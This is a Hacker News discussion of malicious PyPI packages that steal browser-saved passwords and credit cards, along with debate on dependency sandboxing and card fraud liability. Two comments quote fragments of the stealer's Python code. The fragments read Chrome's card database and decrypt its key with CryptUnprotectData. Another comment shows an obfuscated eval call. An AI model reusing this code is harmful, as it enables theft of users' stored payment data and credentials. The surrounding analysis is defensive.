It seems to me like one low hanging fruit to make a lot of these kinds of exploits significantly more difficult is protection at a language level about which libraries are allowed to make outgoing HTTP requests or access the file system. It would be great if I could mark in my requirements.txt that a specific dependency should not be allowed to access the file system or network, and have that transitively apply to everything it calls or eval()'s. Of course, it would still be possible to make malware that exfiltrates data through other channels, but it would be a lot harder.

I am not aware of any languages or ecosystems that do this, so maybe there's some reason this won't work that I'm not thinking of.


Deno (a Node-like runtime by the original author of Node) has a security model kind of like this [0]. Its unfortunately not as granular as I think it should be (only operates on the module level and not individual dependencies), but its a start.

[0] https://deno.land/manual/getting_started/permissions


Ryan Dahl, (above mentioned creator of Deno), gave his second podcast interview ever this spring, it went live June 8th. [1]

It covers a lot of terrain including the connectivity permissions control.

I recommend it as an easy way to learn about Deno and how it is different from Node as it is today.

Node seems to have evolved to handle some of what Deno set out to do at the start. It is worth hearing from Dahl why Deno is still relevant and for what use cases.

Dahl speaks without ego and addresses interesting topics like the company built around Deno and monetization plans.

[1] https://changelog.com/podcast/443


What you want sounds like the way Java sandboxing worked (commonly seen with Java applets). The privileged classes which do the lower-level operations (outgoing network requests, filesystem access, and so on) ask the Java security code to check whether the calling code has permission to do these operations, and that Java security code throws an exception when they're not allowed.


Yes, and also, this is an extraordinarily complex design to implement and get right. Java more or less failed in contexts where it was expected to actually enforce those boundaries reliably - untrusted applets on the web. It's working great in cases where the entire Java runtime and all libraries are at the same trust level and sandboxing/access control measures, if any, are applied outside the whole process - web servers, unsandboxed desktop applications like Bazel or Minecraft, Android applications, etc. Security vulnerabilities in Java-for-running-untrusted-applets happened all the time; security vulnerabilities that require you to update the JRE on your backend web servers are much rarer.

If you make a security boundary, people are going to rely on it / trust it, and if people rely on it, attackers are going to attack it for real. Making attacks harder isn't enough; some attacker will just figure it out, because there's an incentive for them to do so. It is often safer in practice not to set up the boundary at all so that people don't rely on it.


If I’m not mistaken I think that some languages with managed effects allow you to do this through types. For example, in Elm HTTP requests have the type of Cmd Msg and the only way to actually have the IO get executed is to pass that Cmd Msg to the runtime through the update function. This means you can easily get visibility, enforced by the type system, into what your dependencies do and restrict dependencies from making http requests or doing other effects.


  >> I am not aware of any languages or ecosystems that do this...
Rebol was designed with such a feature - http://www.rebol.com/docs/words/wsecure.html


I started building this at one point. Basically there's an accompanying manifest.toml that specifies permissions for the packages with their checksums, and then it can traverse the dependency graph finding each manifest.toml.

It also generated a manifest.lock so if manifests changed you would know about it.

Then once it built up the sandbox it would execute the build. If no dependencies require networking, for example, it gets no networking, etc.

I stopped working on it because I didn't have time, and it obviously relied on everyone doing the work of writing a manifest.toml and using my tool, plus it only supported rust and crates.io

TBH it seems really easy to solve this problem, it's very well worn territory - Browser extensions have been doing the same thing for decades. Similarly, why can I upload a package with a near-0 string distance to another package? That'd help a massive amount against typosquatting.

No one wants to implement it who also implements package managers I guess.


This can be done with capability-based operating system, though it requires running the libraries you want to isolate in a separate process.

On a capability-based OS you whitelist the things a given process can do. For instance, you can give a process the capability to read a given directory and write to a different directory, or give the capability to send http traffic to a specific URL. If you don't explicitly give those capabilities, the process can't do anything.


I've been thinking about this a lot as I consider the scripting language for finl.¹ I had considered an embedded python, but ended up deciding it was too much of a security risk, since, without writing my own python interpreter (something I don't want to do), sandboxing seems to be impossible. Deno is a real possibility or else forking Boa which is a pure Rust implementation of JS.

1. One thing I absolutely do not want to do is replicate the unholy mess that's the TeX macro system. There will be simple macro definitions possible, but I don't plan on making them Turing complete or having the complex expansion rules of TeX.


I was wondering earlier how useful deno's all-or-nothing policies would actually be in the real world. It seems like rules like this (no dep network requests, intranet only, only these ips) are much more useful than "never talk to the web".

For python this probably wont ever be possible given the way the import system works and the patching packages can do.


Portmod[0] is a package manager for game modifications (currently Morrowind and Doom), and it runs sandboxed Python scripts to install individual packages. So I think this is possible, but it's not a built-in feature of the runtime as is the case for deno.

[0]: https://gitlab.com/portmod/portmod


This is a great idea, but I'm not sure how it could be implemented without cgroups, which are a pain, especially when you don't have root access.


```

def cs():

    master_key = master()

    login_db = os.environ['USERPROFILE'] + os.sep + \
        r'AppData\Local\Google\Chrome\User Data\default\Web Data'

    shutil.copy2(login_db, "CCvault.db")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = dpw(
                encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
```

Where does master_key come from here? Is chrome encryption of sensitive information really as weak as that?


It appears to be:

  def master():
      try:
          with open(os.environ['USERPROFILE'] + os.sep + 
  r'AppData\Local\Google\Chrome\User Data\Local State',
                    "r", encoding='utf-8') as f:
              local_state = f.read()
              local_state = json.loads(local_state)
      except:
          pass
      master_key = base64.b64decode(local_state["os_crypt"] 
 ["encrypted_key"])
      master_key = master_key[5:]
      master_key = 
  ctypes.windll.crypt32.CryptUnprotectData(
          (master_key, None, None, None, 0)[1])
      return master_key


What do you expect it to be "encrypted" with? Unless the user is entering a password every time they start the browser, there's nothing unique to a system that other malware can't just extract and use to decrypt the database.


On Mac, you could store the master key in the Keychain. I've been off of Windows for almost a decade so I'm not sure if they have a similar feature.

> Keychain items can be shared only between apps from the same developer.

https://support.apple.com/guide/security/keychain-data-prote...


Palemoon on linux uses the gnome keyring. You have to auth against that to get access to your saved passwords.


Windows doesn't have a system level key store.

Instead the Windows API's have a symmetric encryption API (DPAPI) that allows developers to supply plain text, and receive cipher text.

It would then be up to developers to persist the cipher text.

DPAPI master key is protected by the OS, behind User Credentials.


isn't it per user though, instead of per developer (like apple)?

a dodgy pypi package that can call CryptUnprotectData too


Per login credential, yes.


so that's essentially useless against this sort of attack?


Right, but I wouldn't have expected that processes outside of chrome could get at its internally managed db (or encrypted properties), especially if it's using an authenticated (chrome) user profile.

Windows doesn't have any application firewalls by default? I thought that was the whole thing that came in with Vista that people were upset about. (Of course, thinking it through, Linux isn't any better, assuming the process is running as the same user.)


If you have untrusted code running on your computer, especially with admin privilege, then it's already game over no matter what you do. Any kind of stored secret can be extracted, and any kind of typed in secret can be keylogged.


This was definitely true a decade ago, but secure elements in processors have opened up all sorts of options. Unfortunately, taking advantage of those is one place where mobile operating systems are far ahead of desktops.


Mobile OS security works by clamping down hard on what the local user can do, by severely restricting your freedom on what you can do with your device, to the point where you can't even access most of the device's file system. It works under the assumption and reality that 99% of users out there don't have root access on their phone. At the other side of the spectrum we have PC where we have full freedom to do what we want with just a "sudo" or "run as admin" away but that comes with a price.


I know in Chrome on Windows, I am asked for my Windows login password if I want to view any saved passwords. Really hope that's not just a "UI" feature, and those passwords really are encrypted.


>Really hope that's not just a "UI" feature, and those passwords really are encrypted.

It's definitely a ui feature. If you want to extract the password all you have to do is visit the login page, open the developer console, and type $("input[type=password]").value


I meant more at rest. I think even if you use an extension like LastPass with a policy that the user can't see the password, it's still going to show up in developer tools under the POST.


I found a copy on a PyPI mirror and at a glance couldn't find any of the malicious code mentioned: https://pypi.tuna.tsinghua.edu.cn/packages/99/84/7f9560403cd...

Also a copy of noblesse2, which I didn't bother to look into due to obfuscation: https://pypi.tuna.tsinghua.edu.cn/packages/15/59/cbdeed656cf...


Anyone can upload anything to PyPI. This is kind of like saying that you detected malicious packages on GitHub - the question is whether anyone actually ran it.

They say that the packages were downloaded 30,000 times, but automated processes like mirrors can easily inflate this. (As can people doing the exact sort of research they were doing - they themselves downloaded the files from PyPI!) Quoting PyPI maintainer Dustin Ingram https://twitter.com/di_codes/status/1421415135743254533 :

> *And here's your daily reminder that download statistics for PyPI are hugely inflated by mirrors & scrapers. Publish a new package today and you'll get 1000 'downloads' in 24 hours without even telling anyone about it.*


Part of the issue is that FOSS, libraries, and independendent package managers and their specific repositories have exploded in about every domain. No longer are there a handful of places where software and libraries exist. Pick an ecosystem and there's probably a sub or additional levels of package/library management ecosystems below it. Developers have really bought into grabbing a package for everything and leveraging hundreds and thousands of packages, most of which have limited to no sort of vetting. We've had software complexity growing over the years, but the one benefit in previous years is that it was in fairly concentrated areas where many eyes were often watching. You could somewhat rely on the fact that someone had looked through and approved such additions to a package repo. It's a naive security but there were more professional eyes you could leverage, lowering overall risk.

Not anymore, it's more of this breakneck speed, leverage every package you can to save resources and glue them together without looking at them in detail, because the entire reason you're using them is because you don't have time. It's not all shops, plenty of teams vet or roll their own functionality to avoid this but there's a large world of software out there that just blindly trusts everything down the chain in an era where there should be less trust. Some software shops have never seen a package or library they didn't like and will use even trivial to implement packages (the benefit of your own implementation being you know it's secure and won't change under your feet unless an inside threat makes the change). There's a tradeoff to externalizing costs and tech debt for maintainance you pass on using these systems, the cost being you take on more risk in various forms.


> Anyone can upload anything to PyPI. This is kind of like saying that you detected malicious packages on GitHub - the question is whether anyone actually ran it.

There's a bigger social problem here. In many communities it has become completely normalized for any dependency to be just added from these types of "anyone can upload" repositories without any kind of due diligence as to provenance or security. It's as if these communities have just given up on that.

For example, if I suggest that a modern web app only use dependencies that ship in Debian (a project that does actually take this kind of thing seriously), many would laugh me out of the building.

The only practical alternative in many cases is to give up trying. It's now rare for projects to properly audit their dependencies because the community at large isn't rallying around doing it. It's a vicious circle.

This kind of incident serves as a valuable regular reminder of the risks that these communities are taking. Dismissing this by saying "anyone can upload" misses the point.


> It's now rare for projects to properly audit their dependencies

In the Python ecosystem, it is at least pretty easy to limit yourself to a handful of developers you trust (e.g. Django developers, Pallets developers, etc.).

In the npm ecosystem however, for instance I just ran `npx create-react-app` and got a node_modules with 1044 subdirectories, a 11407-line yarn.lock, and "207 vulnerabilities found" from `yarn audit`. Well what can you possibly do.


>> if I suggest that a modern web app only use dependencies that ship in Debian (a project that does actually take this kind of thing seriously), many would laugh me out of the building

And you are more right, and they are more wrong than they know.

Not only are malicious inserts in code a problem in themselves, if you have failed to properly vet your dependencies and it causes real losses for one of your users/customers, YOU have created a liability for yourself. Sure, many customers may never figure it out, and it might take them a while to prove it in court, but if it even gets to the point where someone is damaged and notices, and decides to do something about it, you have defense costs.

The "whatever" attitude has no place in serious engineering of any kind, and anyone with a "move fast and break things" attitude (unless these tests are properly sandboxed) shows that they are not engaged in any serious engineering.


If anyone wonders about the same for NPM, it is around 400. That what happened to my almost empty package.

https://i.imgur.com/Ryr2voN.png


Doesn't installing a python package from PyPI (optionally) run some of the code in the package? Like "setup.py" ? I'd take advantage of that if I were injecting malicious code in a module.


Yep. In fact, I recently had to deal with this monstrosity https://pypi.org/project/awslambdaric whose setup.py invokes a shell script https://github.com/aws/aws-lambda-python-runtime-interface-c...

That shell script runs 'make && make install' on a couple of bundled dependencies, but in principle it could do anything https://github.com/aws/aws-lambda-python-runtime-interface-c...


For what it's worth, npm supports an option "ignore-scripts" for both "npm install" and "npm ci" (the latter of which ensures the installed packages match the integrity hashes from the package-lock.json file).

https://docs.npmjs.com/cli/v7/commands/npm-install/#ignore-s...

https://docs.npmjs.com/cli/v7/commands/npm-ci/#ignore-script...


Downloading a Python package (as done by scrapers, mirrors and security analysts) does not run setup.py. Only if the module is installed is this run.

It's analagous to downloading vs. running an executable.


Doing a pip install actually runs the setup.py of the package for source dist, which means running an executable.

It's not the case for wheels though, so you can protect yourself by restricting to binary : --only-binary.

Also doing a pip download is not sensible to this issue, but most people do pip install


Ah, sure. Just making the distinction that you don't have to actually use a module within your code. That installing the module, even if you never use it in your own code, runs some of the code in that module.



I wonder how many Python packages have a justifiable reason for using `eval()` to begin with. I've been writing Python professionally for almost a decade and I've never run into a use case where it has been necessary. It's occasionally useful for debugging, but that's all I've ever legitimately considered it for.

It's neat that JFrog can detect evaluation of encoded strings, but I think I'd prefer to just set a static analysis rule which prevents devs from using `eval()` in the first place.


You can always call eval without ever mentioning eval in code:

    __builtins__.__dict__[''.join(chr(x^y^(i+33)) for i,(x,y) in enumerate(zip(*[iter(ord(z) for z in '2vb63qz2')]*2)))]("print('hello, world')")
Maybe there are ways to detect all of the paths, but it feels like a tricky quest down lots of rabbit holes to me.

There are also some fairly big packages that use eval(), like flask, matplotlib, numba, pandas, and plenty of others. Perhaps they could be modified to not use eval, but it might be more common than you expect.


There are plenty of ways you can obfuscate calls to `eval`. `unpickle` is a classic example.


I don't think there's a good reason to have eval in interpreted languages. Sure the REPL uses it but it could be implemented internal to the REPL instead of exposing it in the language.


namedtuple used exec()

(I've also used exec() for some nasty bundling of multiple python files into one before)


http://webcache.googleusercontent.com/search?q=cache%3Ahttps... Google cache still has the malicious package visible FWIW

> This Module Optimises your PC For Python


> This Module Optimises your PC For Python

Well, it does... just not for your Python...


All your Pythons are belonging to us


Our python


> The second payload of the noblesse family is an “Autocomplete” information stealer. All modern browsers support saving passwords and credit card information for the user:

> Browser support for saving passwords and credit card information

> This is very convenient, but the downside is that this information can be leaked by malicious software that got access to the local machine.

I never store CC deets anywhere, not even in a secure password manager vault. I typically manually type it out from the card, as I rarely use a CC (Every month or so I use it). I can see why automatically filling in CC info would be useful for people who use their CC a lot.

If I was using it a lot, I would use a non-browser password manager however, since browser secrets can be exfil'd via various means and I trust a non-browser password manager vault more.


Credit cards are insecure by design and worrying about having them stolen from your browser or vault is not worth it in my opinion. You're far more likely to have it compromised from the retailer side no matter how careful you are. Also, it's easy to set up a notification on your phone for every time a card is used, so you can report fraud before any harm is done.


Some online banks (don't know how widespread this is) allow you to create "virtual card" that expire either after 1 purchase or at a specific date (and with a set maximum of budget). I use them for every single purchase I make online, it's inconvenient but at least i've never entered my real card info anywhere.


That sounds like a lot of work. At least in the US you are not responsible for fraud. (I think the law may have like a $50 liability thing, but Visa/MC waive). So it's better to just not do this, and every 3-4 years when my CC is stolen, call them up - dispute the charges, get a new number. Takes < 5 minutes and I keep going.

For what it's worth, the 2 times my number got stolen in the last 6 years, one was from a rogue agent at a hotel in Chicago, and one was from a bad website that stored credit cards.


In Portugal, you basically open the app, scan fingerprint to give permission and get a new card.

You can even scan the card via webcam or copy the details to clipboard.

The virtual card also limits itself either to single transaction or single store so it can't be used even if compromised on store level.

It's pretty simple process (<30sec) and it's really useful.


> That sounds like a lot of work.

My bank has a browser plugin that can create virtual cards with just a few clicks.

> dispute the charges, get a new number. Takes < 5 minutes and I keep going.

This isn't the case for me, it would take me quite a bit of time over a period of several weeks to update all of the places i use my card if I were using the same number everywhere and it was compromised. I handle a lot of billing. I've had cards compromised at least three times in the past and it's very unpleasant. (for me)


Privacy (dot) com offers that as a service and you can use their extension to generate a card without leaving the page.


Exactly this. I just assume my credit card will be stolen or leaked. Nearly every credit card has zero liability protection too so there is no use in worrying, this is why I use credit cards.


Liability and protection provided by credit cards is one of the reasons some people suggest using them and never using a debit card. Easier to get money back if it gets stolen from a credit card (assuming some YouTube video I saw was accurate).


I definitely want to avoid having my credit card details stolen. The inconvenience of calling the bank to report fraudulent transactions and then waiting a few weeks for a replacement card to arrive is something to avoid if you value your time.

I save most passwords in the browser, including discord, but not important things like banks and emails. Password manager for that. I think it's foolish of Chrome to offer to save CC details.


In the US, CC has, by law, almost no liability for fraud - it's capped at 50 bucks, and is 0 bucks if you report it before it gets used. They are also easily replaced, so i think many wouldn't go as far as you are.

Debit cards are weirder in their liability (and are extracting money from your bank account, which is harder to get back).

If you report them lost/stolen before someone uses them, it's 0 bucks Within 2 days of learning about it, it's 50 bucks. More than 2 days, but less than 60, 500 bucks. More than 60 days - unlimited liability.

So i'd be a lot more careful with debit cards, at least in the US.

(You are never liable on either for unauthorized transactions when your card is not lost/stolen as long as you report them within 60 days)


Hmm. I understood this to be different, but realizing now I don’t have sources for where I learned this:

* Bank accounts, savings accounts, brokerage accounts, etc. are all unlimited liability

* Lines of credit are all zero liability

I’ve used this as a rule of thumb for many years, and was the initial reason for me switching to 100% credit cards for transactions.


Yeah, i'm telling you based on what the statutes say (the FCBA covers credit cards, the EFTA covers debit)

A short version of it is here: https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-cr...


I would never ever use a debit card outside of the ATM of the bank I belong to.

Credit card? Go wild, use it everywhere.


I use CC for everything. Shop tons online, multiple sites . Store my CC on browser and share that across desktop, laptop, ipad and phones.

In last 10 years I've had one incident were CC company did not automatically deny fraud. Two purchases both refunded to me.


I've been thinking I should probably just memorising my card number. Would take a bit of effort but can't be much harder than memorising a phone number, and possibly faster than entering my master password to unlock my password manager


I've memorized my last 2 credit card numbers. Takes about 5-10 minutes and is absolutely worth it!


I’ve done it a number of times without even trying. Problem is if you have to replace it a lot.


What I like about the Mac implementation of storing credit cards is that it requires using touch ID to autofill the credit card info. There's no autofill without explicit user interaction.


This is why I use packages from a Linux distribution - specifically Debian.


On Windows 10 if I want to view plaintext of stored password in chrome, the password of the currently logged in Windows user will be required. So is password stored and encrypted? Just wondering if the same is done to cc information and if such practice is effective against malware stealing


I'm using Github Codespaces since a few months and I'm wondering whether developing in such a remote sandbox is an improvement for security. I feel like it would prevent a python or npm package to steal my cookies and credit card numbers.


Elixir recently added hex diff, which I've found quite useful. E.g.: https://diff.hex.pm/diff/jiffy/1.0.7..1.0.8


Can trusted PyPI packages or other language packages be taken over? Can their author once benevolent become malicious and inject code and push a minor version after they wake up one day?


there once was an adblocker called nano which was open source and quite popular. the developer sold the ownership and the new owners injected malware which was then shipped to all chrome users with the extension.

so i don't see why the same shouldn't work for pypi packages and i also don't understand why noone saw this coming. with how many companies have adopted python there surely will be a security vendor willing to provide free package screening for the repo


why don't they start a partnership with a security company like they have with a server monitor and google? many security vendors use python somewhere (1), so I'm sure there would be someone willing to cooperate. scan all packages uploaded and all updates, when there is a detection put a warning on the page and in console put a warning like "this package might contain maliscious code. continue regardless?" so that typosquatting and code hijacking is mitigated

1 https://github.com/KasperskyLab?q=&type=&language=python&sor...

https://github.com/CrowdStrike?q=&type=&language=python&sort...

https://github.com/intezer?q=&type=&language=python&sort=


I feel like they could have done a better job hiding the code. Even something as simple as base64 the code and storing it as a constant and then doing an eval. Scanning for something like table name credit_card is simple enough to expose this exploit. Now I'm worried what other exploits of similar form are out there that remain undetected.


There is lots of inconsistency about hash behavior with the various repos (pypi, ruby gems) and tools (poetry, bundled).

For a long time poetry didn’t even check the hash. So the safer option is just maintain these artifacts yourself so you know what is going on and have your own policies on maintaining them.


I've never heard of these libraries. Anyone know what they did?


holy crap the stuff in: AppData\Local\Google\Chrome\User Data\default\Web Data ... wtf are you thinking google?


The result of having a hiring barrier too high.


how to check if any of these packages are installed on a system? It seems like python (mac version, various homebrew versions) writes packages all over the place, from user-local dirs, to /usr/local etc.


I have some pretty complex feelings about this.

Many people end up at a given programming language because they are fleeing something else, rather than being necessarily drawn to it, and I know that in some senses, Python was my reaction to having to deal with what I didn't like about Perl. One of the larger factors was dealing with CPAN. I was always having to hunt down modules, which would do maybe seventy percent of what I needed, or a another module, that would cover a different seventy percent. And then comes the question of, "Can I get this to run on Windows?"

Meanwhile, Python made hay with its enormous standard library and certainly xkcd made many references to it. Now people tell me that the standard library is where code goes to die and I get sad all over again ...


Nice writeup, but the title flashes to '(1) New Message' and back twice a second. That's kind of silly in my opinion, from whom do I expect the message? I assume from the chatbot at the bottom right corner.

Even so, to talk to it I would need to grant it access to some personal information.

It all ends up leaving a bitter aftertaste. Whatever the message was, why not place it in a block of text somewhere less distracting.

I appreciate the writeup however.


This junk is appearing on more and more web sites, at least this one is clearly a bot.

Plenty of sales sites will pretend a human is sending you a message, try and talk back and all of a sudden you're in a queue waiting for a reply.

Another anti pattern for web.


Yeah. The sad thing is, I've never used a single chatbot that was actually helpful. I naturally don't go looking for conversations with chatbots, but recently more and more companies decided to shut down their email address. So the only way to resolve an issue is by wither talking to a chatbot and then a person (hopefully), or by phoning them (and I'd rather not).

Some chatbots even refuse to let me talk to a person at all due to a bug (the dutch water utility service). Another asks you to write a message to the human representative and then discards it due to a bug (bol.com).


I've had some success finding the pages or processes I need on a site with virtual assistants, but the design of the website had failed in the first place if I had to resort to that.


It's a billion-dollar anti-pattern that's been sanitized as "conversational commerce". Several large orgs have Intercom, Drift or other popups infesting their site....by choice!


> This junk is appearing on more and more web sites, at least this one is clearly a bot.

This is the first time I've seen a page flashing the title like that. Extremely annoying and I closed the page before reading the article to the end. It reminded me of the times when pages used to do that with the browser status bar on the bottom of the window.


Well don't be rude, say hi, you never know if it's a person on the other end. In that case it's ok to open up about the current events in your dogs' life.


Add these to your hosts file and the page will load a lot faster, too:

   0.0.0.0 js.driftt.com
   0.0.0.0 send.webeyez.com sec.webeyez.com
   0.0.0.0 splitting.peacebanana.com flaming.peacebanana.com


I am surprised this doesn’t happen to NPM all the time


How do you know it doesn't?



Oh at last, I can feel slightly less ashamed of being part of the Israeli technology scene.


כל ישראל ערבים זה לזה


I fully believe in this statement, and let me assure you I'm proud to be Israeli. But, when NSO articles pop like mushrooms after rain, I feel sad for a period of time (a feeling I also encounter when I read about Israeli internet gambling companies).


Interesting that all the noted examples assume a Windows host. I like that, people that use Windows deserve the drama the get ;-)


Sometimes they don't get a choice. Specially in a corporate environment.


Oh look, an advertisement.

Also, thank you for causing mass disruption in javaland by shutting down your repos on pretty short notice.

Artifactory may be a good piece of software with a good purpose, least of which is the public repository security problem, but every company I have been has used it with a hammer to stifle use of open source and create a "lords of data" style fiefdom in the company with tons of procedures.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: